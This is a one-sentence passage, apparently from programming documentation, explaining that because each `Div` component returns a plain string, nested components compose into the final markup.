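Because each `Div` returns a plain string, nesting components composes naturally into the final markup.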